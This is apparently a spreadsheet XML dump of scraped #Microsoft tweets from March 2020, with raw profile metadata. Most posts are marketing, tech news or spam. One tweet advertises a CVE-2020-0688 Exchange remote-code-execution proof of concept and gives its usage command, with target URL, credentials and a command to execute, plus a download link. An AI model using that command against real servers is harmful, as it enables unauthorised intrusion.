'https://pbs.twimg.com/profile_images/936947567174205443/PZZ00H_U_normal.jpg', 'profile_link_color': '1B95E0',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</si>
  <si>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Tue Mar 03 12:06:20 +0000 2020</t>
  </si>
  <si>
    <t>Azure PowerShell Az: List and Set #AzureSubscription
 #DevOps #Azure #Microsoft
https://t.co/X4XFUBdXGx</t>
  </si>
  <si>
    <t>Tue Mar 03 12:05:59 +0000 2020</t>
  </si>
  <si>
    <t>Create Live Tile to Display Network Data Usage in #Windows 10 - https://t.co/I9hTRDtgHG #Guide #LiveTiles #Microsoft #IT #techblogger #mblogger #techygeekshome https://t.co/7sEl0usygF</t>
  </si>
  <si>
    <t>Tue Mar 03 12:03:19 +0000 2020</t>
  </si>
  <si>
    <t>#AWS have become one the most desirable skills in the industry. Similarly, #Azure is another growing #CloudComputing #services from #Microsoft. 
In this video, https://t.co/2pxhbXjQPQ you will discover their services difference. 
#GangBoard #amazon #amazonwebservices #Databases</t>
  </si>
  <si>
    <t>Tue Mar 03 12:02:35 +0000 2020</t>
  </si>
  <si>
    <t>CVE-2020-0688:-- #Remote #Code #Execution on #Microsoft Exchange #Server #PoC
Usage:-
python https://t.co/ToRsvPOoXU -s https://ip/owa/ -u user -p pass -c "ping https://t.co/LkXAdGCHGq"
#Download #Link:-
https://t.co/DvPxeiR3nX</t>
  </si>
  <si>
    <t>{'id': 1183515132, 'id_str': '1183515132', 'name': 'Vasileiadis A. (Cyberkid)', 'screen_name': 'Anastasis_King', 'location': 'Thessaloniki', 'description': 'PC Technician, Penetration Tester, Ethical Hacker, Cyber Security Expert, Malware Analyst, Information Security Researcher, Reverse engineering', 'url': 'https://t.co/U0EMvsY1Cx', 'entities': {'url': {'urls': [{'url': 'https://t.co/U0EMvsY1Cx', 'expanded_url': 'http://www.prodefence.org', 'display_url': 'prodefence.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1064, 'friends_count': 1190, 'listed_count': 35, 'created_at': 'Fri Feb 15 19:10:58 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24708,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'http://pbs.twimg.com/profile_images/1206541065815244805/hsk5DK2r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206541065815244805/hsk5DK2r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1183515132/1456522837', 'profile_link_color': '3B94D9',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</si>
  <si>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12:01:43 +0000 2020</t>
  </si>
  <si>
    <t>We're helping #Microsoft Partners grow their business through quick, affordable and accessible #legalservices. https://t.co/Cu5mr6ErGu https://t.co/y4sDnm6oOt</t>
  </si>
  <si>
    <t>{'id': 1157238287708409858, 'id_str': '1157238287708409858', 'name': 'Law 365', 'screen_name': 'Law365_UK', 'location': 'London', 'description': 'Weâ€™re helping #MSpartners grow their #business through quick, affordable and accessible #LegalServices.\nDownload our FREE Report here ðŸ‘‰ https://t.co/7QuZSYu614', 'url': 'https://t.co/IMzKF5WPd4', 'entities': {'url': {'urls': [{'url': 'https://t.co/IMzKF5WPd4', 'expanded_url': 'https://www.law365.co/', 'display_url': 'law365.co', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/7QuZSYu614', 'expanded_url': 'http://t.ly/ZKn9N', 'display_url': 't.ly/ZKn9N', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 53, 'friends_count': 379, 'listed_count': 0, 'created_at': 'Fri Aug 02 10:34:43 +0000 2019', 'favourites_count': 106, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 272, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1174962960935972865/3HmLALcB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174962960935972865/3HmLALcB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1157238287708409858/1568972296',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</si>
  <si>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12:00:56 +0000 2020</t>
  </si>
  <si>
    <t>Are you building a new intranet? Look no further, download our free guide today!
https://t.co/ZjZuFXTa6z https://t.co/ZjZuFXTa6z
#intranet #office365 #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 12:00:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft sets #PowerAutomates #RPA pricing, general availability for April 2 #appsmgt https://t.co/jdUhFXVJUr https://t.co/cPfAG5Qmck</t>
  </si>
  <si>
    <t>{'id': 1090701218731778048, 'id_str': '1090701218731778048', 'name': 'Amanda Rothwell', 'screen_name': 'rothwell_amanda', 'location': 'Leicestershire, England, Unite', 'description': 'Avid problem solver. Music enthusiast. TV fanatic. Friendly travel ninja. Food &amp; drink enthusiast. SAP nerd and general all round chatterbox @Capgemini #AppsMgt', 'url': 'https://t.co/Gs0x2ql5dC', 'entities': {'url': {'urls': [{'url': 'https://t.co/Gs0x2ql5dC', 'expanded_url': 'https://www.capgemini.com/experts/application-services/amanda-rothwell/', 'display_url': 'capgemini.com/experts/applicâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 221, 'friends_count': 416, 'listed_count': 4, 'created_at': 'Wed Jan 30 20:00:09 +0000 2019', 'favourites_count': 304, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2402,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'http://pbs.twimg.com/profile_images/1230975722421813249/5S8Yt5qR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230975722421813249/5S8Yt5qR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1090701218731778048/1557086853',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</si>
  <si>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12:00:07 +0000 2020</t>
  </si>
  <si>
    <t>"The success of the food revolution will depend on data." #Microsoft #AI https://t.co/lmBjzXSgbP</t>
  </si>
  <si>
    <t>{'id': 132163386, 'id_str': '132163386', 'name': 'EfrÃ©n Hdz', 'screen_name': 'ejimenez99', 'location': 'Mexico City', 'description': 'Digital Transformation and  Digital Performance professional with nostalgia for the analog days...', 'url': 'https://t.co/YBw5VG63It', 'entities': {'url': {'urls': [{'url': 'https://t.co/YBw5VG63It', 'expanded_url': 'https://ejimenez99.sarahah.com/', 'display_url': 'ejimenez99.sarahah.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 327, 'friends_count': 1140, 'listed_count': 8, 'created_at': 'Mon Apr 12 13:12:27 +0000 2010', 'favourites_count': 1686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7042,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'http://pbs.twimg.com/profile_images/677257539004719104/J2uEcrda_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/677257539004719104/J2uEcrda_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/132163386/1575249120',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</si>
  <si>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Tue Mar 03 11:59:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Lenovo have teamed up to validate the #Lenovo #ThinkSystem SE350 for Microsoft's #Azure Stack HCI program. #WeAreLenovo, #LenovoDatacenter, #HyperConvergence. https://t.co/NffACA0AZ7</t>
  </si>
  <si>
    <t>{'id': 851920370005311489, 'id_str': '851920370005311489', 'name': 'Joris Derden', 'screen_name': 'JorisDerden', 'location': 'Antwerp, Belgium', 'description': 'âœª Experienced (+15 yrs) &amp; highly motivated ICT Marketing Manager âœª Proud father of 2 lovely daughters âœª Passionate foodie âœª Loyal fan of K Beerschot VA.', 'url': 'https://t.co/DdRlpjHf0B', 'entities': {'url': {'urls': [{'url': 'https://t.co/DdRlpjHf0B', 'expanded_url': 'https://www.linkedin.com/in/jorisderden', 'display_url': 'linkedin.com/in/jorisderden', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 449, 'listed_count': 2, 'created_at': 'Tue Apr 11 22:10:18 +0000 2017', 'favourites_count': 190, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 265,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'http://pbs.twimg.com/profile_images/1215645750597750787/oFjA-Hg1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215645750597750787/oFjA-Hg1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/851920370005311489/1491983552',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</si>
  <si>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11:58:55 +0000 2020</t>
  </si>
  <si>
    <t>Blog Link: https://t.co/BMrWAnFKPU
#Typetec #Microsoft</t>
  </si>
  <si>
    <t>{'id': 951793292, 'id_str': '951793292', 'name': 'Typetec', 'screen_name': 'TypetecIreland', 'location': 'Dublin', 'description': 'IT Cloud Managed Service Provider. Microsoft Gold Certified Partner, Apple Authorised Reseller &amp; Service Provider, HP Gold VMware Enterprise and Citrix Partner.', 'url': 'https://t.co/yQ8QQRWqQ4', 'entities': {'url': {'urls': [{'url': 'https://t.co/yQ8QQRWqQ4', 'expanded_url': 'http://www.typetec.ie/', 'display_url': 'typetec.ie', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 953, 'friends_count': 2113, 'listed_count': 13, 'created_at': 'Fri Nov 16 14:31:00 +0000 2012', 'favourites_count': 543, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1485, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00B0AF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1035171196231405568/35M2mwfW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035171196231405568/35M2mwfW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/951793292/1582874961', 'profile_link_color': '00B0AF',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</si>
  <si>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11:54:02 +0000 2020</t>
  </si>
  <si>
    <t>It has OFFICIALLY hit March 3rd in #Germany. T-Minus 24 hours or LESS for the BIG news to DROP from $UBT.  Guys, the rocket ship is FUELING up. THE CEO/CTO never HYPE things up at @UnibrightIO. #DeFi #Chainlink #ETHEREUM #ether2 #Microsoft #Azure #EEA #supertuesday2020 #Bitcoin</t>
  </si>
  <si>
    <t>Tue Mar 03 11:52:45 +0000 2020</t>
  </si>
  <si>
    <t>'Big names like #Microsoft, #Accenture &amp;amp; #Uber are hopping on the bandwagon.' #Diversity #Employment #Employer #Equality #Inclusion #India #Jobs #JobFairs #LGBTIQ #LGBTI #LGBTQ #LGBT #LGTBI #LGTBQ #LGTB #Queer #Rainbow #Section377 #Society #Work #Workplace
https://t.co/vyybw1TNf5</t>
  </si>
  <si>
    <t>{'id': 1094215061831409664, 'id_str': '1094215061831409664', 'name': 'The Miniscule Minority ðŸŒˆ', 'screen_name': 'MinisculeThe', 'location': 'India', 'description': "There shouldn't be majority/minority but equal citizenship/equal rights! Each should have right to love/be loved or to marry/be parents! ðŸ’œðŸ’™ðŸ’šðŸ’›ðŸ’–ðŸ’—ðŸ’Ÿ ðŸ‘« ðŸ‘¬ ðŸ‘­", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 18, 'listed_count': 1, 'created_at': 'Sat Feb 09 12:42:55 +0000 2019', 'favourites_count': 139, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2616, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234772953419530240/x9jopKjn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234772953419530240/x9jopKjn_normal.jpg',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</si>
  <si>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11:51:28 +0000 2020</t>
  </si>
  <si>
    <t>TEAM COMPETENT #NCIIPASSER  #MICROSOFT #WEWINASONE https://t.co/xWqEbL71Ik</t>
  </si>
  <si>
    <t>{'id': 3017155706, 'id_str': '3017155706', 'name': 'shirahoshi', 'screen_name': 'jadeclpz', 'location': '', 'description': 'ilovetissue :))', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 507, 'friends_count': 321, 'listed_count': 0, 'created_at': 'Thu Feb 12 08:30:50 +0000 2015', 'favourites_count': 10455, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14158,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'http://pbs.twimg.com/profile_images/1232277485821124608/VW4-8Jsb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232277485821124608/VW4-8Jsb_normal.jpg',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</si>
  <si>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11:50:48 +0000 2020</t>
  </si>
  <si>
    <t>They don't actually have to pay you anything and can keep it all for themselves. #Microsoft #SmallBusiness #Apps #Jobs #Marketing #Software #SystemAdministration https://t.co/71v8kLw7pY</t>
  </si>
  <si>
    <t>{'id': 2586136873, 'id_str': '2586136873', 'name': 'CGS Computers', 'screen_name': 'CGS_Computers', 'location': 'Parkville, MD', 'description': 'CGS Computers provides website design/maintenance and technical consulting of all types. Use #TechNews for a retweet chance.', 'url': 'https://t.co/YUzHK7DBPD', 'entities': {'url': {'urls': [{'url': 'https://t.co/YUzHK7DBPD', 'expanded_url': 'http://cgscomputer.com', 'display_url': 'cgscomputer.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6688, 'friends_count': 99, 'listed_count': 1878, 'created_at': 'Tue Jun 24 17:52:25 +0000 2014', 'favourites_count': 1273, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 47884,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'http://pbs.twimg.com/profile_images/920409567342800897/kw1oLVK8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920409567342800897/kw1oLVK8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2586136873/1403661309', 'profile_link_color': 'FF691F',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</si>
  <si>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11:48:30 +0000 2020</t>
  </si>
  <si>
    <t>#Apple become a nightmare ! I cant backup my SD card into my external HDD ! I have to switch to Linux or Windows both are able to store files a same hdd. #linux #microsoft</t>
  </si>
  <si>
    <t>{'id': 1621776864, 'id_str': '1621776864', 'name': 'D.Ahmed', 'screen_name': 'morpheus213', 'location': 'Paris, France', 'description': 'never Give Up', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 100, 'listed_count': 1, 'created_at': 'Fri Jul 26 02:25:22 +0000 2013', 'favourites_count': 180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 460,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'http://pbs.twimg.com/profile_images/1104189849098174464/QUeQORCB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1104189849098174464/QUeQORCB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1621776864/1552094410', 'profile_link_color': '0253B0',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</si>
  <si>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11:44:53 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Deep Learning with TensorFlow 2.0 [2020] #udemycoupon -&amp;gt; https://t.co/4nVOQO0vKb
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Tue Mar 03 11:43:33 +0000 2020</t>
  </si>
  <si>
    <t>Are you a #retailer?
Know your customer history with #Microsoft #Dynamics365CRM.
For more, https://t.co/cbd2skPILa
#Microsoftdynamics #MicrosoftDynamics365 #microsoftcrm #CRM #microsoftpartner #CRMSolution #customer #customersatisfaction #customerhistory @BaffleSol https://t.co/riYGWHNvgz</t>
  </si>
  <si>
    <t>Tue Mar 03 11:42:45 +0000 2020</t>
  </si>
  <si>
    <t>If your business is looking to kick start your journey with Microsoft Power BI, Simpson Associates Power BI Accelerator will get you up and running fast. Discover more today: https://t.co/bIsY57oyef
#Microsoft #MicrosoftPowerBI #MicrosoftGoldPartner #PowerBI #PowerBIAccelerator https://t.co/uAviXFWAAo</t>
  </si>
  <si>
    <t>{'id': 195671811, 'id_str': '195671811', 'name': 'Simpson Associates', 'screen_name': 'simassoc', 'location': 'York', 'description': 'A software and services consultancy covering data management, management reporting, and predictive analytics through to student &amp;financial planning &amp; reporting.', 'url': 'http://t.co/jRLeNIMUtC', 'entities': {'url': {'urls': [{'url': 'http://t.co/jRLeNIMUtC', 'expanded_url': 'http://www.simpson-associates.co.uk', 'display_url': 'simpson-associates.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 311, 'friends_count': 254, 'listed_count': 36, 'created_at': 'Mon Sep 27 08:57:27 +0000 2010', 'favourites_count': 156, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1264, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '114C74', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1040525716448792576/ndiE4uAx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1040525716448792576/ndiE4uAx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/195671811/1536915880',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</si>
  <si>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Tue Mar 03 11:41:49 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPChttps://zcu.io/sexG 
#virtualmachine #azure #microsoft #eclipse #cloudcomputing #cloud #technology #computing #issquared https://t.co/tl1RVXRFQx</t>
  </si>
  <si>
    <t>Tue Mar 03 11:41:22 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/RBR5RtQ2kw</t>
  </si>
  <si>
    <t>{'id': 916763520, 'id_str': '916763520', 'name': 'Managed IT Experts', 'screen_name': 'ITExpertsUK', 'location': 'Scotland', 'description': 'IT Support', 'url': 'http://t.co/CHs5k8W24E', 'entities': {'url': {'urls': [{'url': 'http://t.co/CHs5k8W24E', 'expanded_url': 'http://www.manageditexperts.co.uk', 'display_url': 'manageditexperts.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 395, 'friends_count': 526, 'listed_count': 36, 'created_at': 'Wed Oct 31 12:22:31 +0000 2012', 'favourites_count': 137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 793,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'http://pbs.twimg.com/profile_images/1222519484574990336/VxdvcNQn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222519484574990336/VxdvcNQn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/916763520/1580309889',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</si>
  <si>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11:41:16 +0000 2020</t>
  </si>
  <si>
    <t>No stream for a few days as Im travelling with work. But Ive packed my laptop and headphones so I will be all over the rest of the Mixer community!! 
Ill be back in time for Pizza Friday ;) 
#Travel #Work #Microsoft #Inspire #ASL #Surface #Laptop #Headphones #Mixer #Streamer https://t.co/GDSCFSNJNb</t>
  </si>
  <si>
    <t>{'id': 1214933824716578817, 'id_str': '1214933824716578817', 'name': '8-Bit-Eliott', 'screen_name': '8BitEliott', 'location': '', 'description': 'Mixer streamer from the UK. Passionate about creating a community for gamers of all backgrounds and abilities to hang out and get involved with.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 159, 'listed_count': 0, 'created_at': 'Wed Jan 08 15:36:18 +0000 2020', 'favourites_count': 224, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 97, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214933939304968194/KlJk9K16_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214933939304968194/KlJk9K16_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1214933824716578817/1581776814',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</si>
  <si>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11:41:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft just canceled two conferences ahead of their major ones https://t.co/pmZKdTL9ld #SankalpIT</t>
  </si>
  <si>
    <t>Tue Mar 03 11:40:58 +0000 2020</t>
  </si>
  <si>
    <t>A Made in USA label accompanied by a flag icon appears to be the latest automated #Ad extension test by #Microsoft Advertising. https://t.co/ifaIfAuSze</t>
  </si>
  <si>
    <t>{'id': 402071486, 'id_str': '402071486', 'name': 'G2C Partners', 'screen_name': 'G2CPartners', 'location': 'Los Angeles', 'description': 'G2CPartners is Los Angeles, CA USA based Search Engine Marketing, Search Engine Optimization, Social Media Marketing, &amp; CMS Website Development Company.', 'url': 'http://t.co/i0SP79WhmX', 'entities': {'url': {'urls': [{'url': 'http://t.co/i0SP79WhmX', 'expanded_url': 'http://www.g2cpartners.com', 'display_url': 'g2cpartners.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1184, 'friends_count': 2349, 'listed_count': 27, 'created_at': 'Mon Oct 31 14:16:10 +0000 2011', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 729,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'http://pbs.twimg.com/profile_images/933952114308497408/bLx9wahX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933952114308497408/bLx9wahX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/402071486/1511506479',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</si>
  <si>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11:35:40 +0000 2020</t>
  </si>
  <si>
    <t>[New Blog Post] Monitor connection to a Virtual Machine using Connection Monitor
https://t.co/rxKXS3XtuP
#microsoft #azure #azurefamily</t>
  </si>
  <si>
    <t>Tue Mar 03 11:34:06 +0000 2020</t>
  </si>
  <si>
    <t>@MichaelGillett @JezCorden Yepp still looks awesome. Unfortunately #Microsoft will fail again and again with their Apps. They failed with Windows phones and will fail with current services too because after more than 10 years they still don't give a shit about other countries that are not US</t>
  </si>
  <si>
    <t>Tue Mar 03 11:30:05 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, AI is helping working parents manage work/life balance. #Microsoft #MSFTAdvocate https://t.co/DEupsHUa5l</t>
  </si>
  <si>
    <t>{'id': 123409510, 'id_str': '123409510', 'name': 'Al Durham', 'screen_name': 'al_durham', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 231, 'friends_count': 907, 'listed_count': 4, 'created_at': 'Tue Mar 16 00:58:00 +0000 2010', 'favourites_count': 652, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3307,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'http://pbs.twimg.com/profile_images/378800000002983225/f934f922771010337bbc6a18ef54c5a6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000002983225/f934f922771010337bbc6a18ef54c5a6_normal.jpeg',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</si>
  <si>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11:28:21 +0000 2020</t>
  </si>
  <si>
    <t>Yesterday was amazing sex. Today will be a good day #Manchester   #magazine #microsoft https://t.co/AaKODhS255</t>
  </si>
  <si>
    <t>{'id': 1234537391333019648, 'id_str': '1234537391333019648', 'name': 'Cindy Tucker', 'screen_name': 'anhugmifacp', 'location': 'Boston, USA', 'description': 'Chemistry is you touching my arm and setting fire to my mind.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Mon Mar 02 17:53:51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'http://pbs.twimg.com/profile_images/1234553650154024968/c57RuZt8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234553650154024968/c57RuZt8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234537391333019648/1583175535',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</si>
  <si>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11:25:50 +0000 2020</t>
  </si>
  <si>
    <t>#ArtificialIntelligence #AI in #Healthcare Market  Report 2020| Global Size, Trend, Scope and Forecast Period Till 2026 | Top Key Players: #IntelCorporation, #Nvidia Corporation, #Google, #IBM Corporation, #Microsoft Corporation, #GeneralVision #HealthTech
https://t.co/ojFNUguGEm</t>
  </si>
  <si>
    <t>{'id': 777462371149156353, 'id_str': '777462371149156353', 'name': 'Margaret Siegien ðŸ’«', 'screen_name': 'MargaretSiegien', 'location': 'Chicago , IL , USA', 'description': 'President at @iTrucker #supplychain #tech #Transportation #logistics #Technology #ArtificialIntelligence #MachineLearning #Robotics', 'url': 'https://t.co/LhBLP7vx3s', 'entities': {'url': {'urls': [{'url': 'https://t.co/LhBLP7vx3s', 'expanded_url': 'http://www.itrucker.com/', 'display_url': 'itrucker.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2013, 'friends_count': 680, 'listed_count': 22, 'created_at': 'Sun Sep 18 11:00:48 +0000 2016', 'favourites_count': 6227, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3006,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'http://pbs.twimg.com/profile_images/1225591675646595073/AUCWD51j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225591675646595073/AUCWD51j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/777462371149156353/1576905208',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</si>
  <si>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11:20:04 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 11:19:10 +0000 2020</t>
  </si>
  <si>
    <t>Out-of-the-box business process automation is making a huge difference for customers. Watch how #MSDyn365BC puts your customers in the limelightwhere they belong! Watch now:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/exlNaUBr2j</t>
  </si>
  <si>
    <t>Tue Mar 03 11:19:08 +0000 2020</t>
  </si>
  <si>
    <t>Out-of-the-box business process automation is making a huge difference for customers. Watch how #MSDyn365BC puts your customers in the limelightwhere they belong! Watch now:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/JAYjFP1VFg</t>
  </si>
  <si>
    <t>Tue Mar 03 11:16:35 +0000 2020</t>
  </si>
  <si>
    <t>Does anyone else miss the Apply button in #Windows ? #win10 #Windows10 #Windows10Pro #Microsoft @Microsoft</t>
  </si>
  <si>
    <t>{'id': 20704071, 'id_str': '20704071', 'name': 'Oleg Belov', 'screen_name': 'olegbelov', 'location': 'Reading, England', 'description': 'The quintessential nearly man.', 'url': 'http://t.co/zsVhIZNZMR', 'entities': {'url': {'urls': [{'url': 'http://t.co/zsVhIZNZMR', 'expanded_url': 'http://www.facebook.com/oleg.belov', 'display_url': 'facebook.com/oleg.belov', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 29, 'listed_count': 1, 'created_at': 'Thu Feb 12 18:55:38 +0000 2009', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 825,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'http://pbs.twimg.com/profile_images/286815368/twitter_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/286815368/twitter_normal.jpg',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</si>
  <si>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Tue Mar 03 11:15:49 +0000 2020</t>
  </si>
  <si>
    <t>Any problem connecting to SQLServer with the new https://t.co/SeXteq431x.SqlClient component due to a "TspParser type not found" error? Try to upgrade to .NET Framework 4.7.2 or install another NuGet named https://t.co/SeXteq431x.SqlClient.SNI #dotnet #SQLServer #Microsoft https://t.co/pQJjiMwKk7</t>
  </si>
  <si>
    <t>{'id': 96309647, 'id_str': '96309647', 'name': 'Adolfo â„¢', 'screen_name': 'FitoMAD', 'location': 'Madrid â€” Mundo Realâ„¢', 'description': 'Me gustan las camisetas, las zapatillas y leer // Por el dÃ­a Research Developer en @HavasVillageES y por la noche desarrollador Swift para los sistemas Apple', 'url': 'https://t.co/oYY42NlHrT', 'entities': {'url': {'urls': [{'url': 'https://t.co/oYY42NlHrT', 'expanded_url': 'http://desappstre.com', 'display_url': 'desappstre.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 344, 'friends_count': 175, 'listed_count': 102, 'created_at': 'Sat Dec 12 09:13:46 +0000 2009', 'favourites_count': 2742, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10425,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'http://pbs.twimg.com/profile_images/1208852512276656129/opOhx6tC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208852512276656129/opOhx6tC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/96309647/1560622550', 'profile_link_color': '1584FB',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</si>
  <si>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11:15:00 +0000 2020</t>
  </si>
  <si>
    <t>Why Office 365 Backup is Essential -- https://t.co/z7EjXf7nyl #Microsoft #IT https://t.co/rXSrOAT8Ue</t>
  </si>
  <si>
    <t>Tue Mar 03 11:14:18 +0000 2020</t>
  </si>
  <si>
    <t>Moving to Public #Cloud | Link &amp;gt;&amp;gt; https://t.co/9h1VpBDjZr . 
#cloudcomputing #Amazon #Aws #Azure #Google #Microsoft #Publiccloud https://t.co/IXC5WMa5EL</t>
  </si>
  <si>
    <t>Tue Mar 03 11:11:54 +0000 2020</t>
  </si>
  <si>
